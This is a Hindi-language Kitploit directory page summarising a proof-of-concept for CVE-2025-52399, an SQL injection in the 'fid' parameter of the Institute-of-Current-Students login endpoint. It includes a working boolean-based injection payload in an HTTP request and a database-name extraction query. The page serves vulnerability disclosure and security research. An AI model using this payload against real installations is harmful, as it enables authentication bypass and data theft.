Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students — CVE-2025-52399 के लिए प्रमाण-अवधारणा शोषण, Institute-of-Current-Students के loginlinkfaculty एंडपॉइंट में SQL इंजेक्शन का प्रदर्शन, प्रमाणीकरण बायपास और डेटा निष्कर्षण सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/userr404/cve-2025-52399-sqli-institute-of-current-students
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubuserr404/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

CVE-2025-52399 के लिए प्रमाण-अवधारणा शोषण, Institute-of-Current-Students के loginlinkfaculty एंडपॉइंट में SQL इंजेक्शन का प्रदर्शन, प्रमाणीकरण बायपास और डेटा निष्कर्षण सक्षम करता है।

रिपॉजिटरी देखें
1561 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-52399 - वर्तमान छात्र संस्थान में SQL इंजेक्शन

सारांश

Institute-of-Current-Students एप्लिकेशन में loginlinkfaculty एंडपॉइंट fid POST पैरामीटर के माध्यम से SQL इंजेक्शन के प्रति संवेदनशील है। SQL क्वेरी में उपयोग करने से पहले पैरामीटर को ठीक से स्वच्छ नहीं किया जाता, जिससे दूरस्थ हमलावर मनमानी SQL कमांड निष्पादित कर सकते हैं।

  • भेद्यता प्रकार: SQL इंजेक्शन
  • प्रभावित घटक: /loginlinkfaculty (POST)
  • प्रभावित पैरामीटर: fid
  • प्रमाणीकरण: आवश्यक नहीं
  • प्रभाव: प्रमाणीकरण बाईपास, डेटा निष्कर्षण
  • परीक्षण किया गया: लोकलहोस्ट
  • डेटाबेस: icsnew
  • संस्करण: 1.0

PoC

HTTP अनुरोध

POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example

पेलोड परिणाम

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → सत्य ❌ -1' OR 2*3=4 AND 000942=000942 -- → असत्य

डेटाबेस निष्कर्षण

SELECT database(); -- returns 'icsnew'

संदर्भ

  • CVE-2025-52399 (MITRE)
  • संवेदनशील एप्लिकेशन
  • OWASP SQL इंजेक्शन

खोजकर्ता

Isroil Mustafoqulov

टूल डाउनलोड करें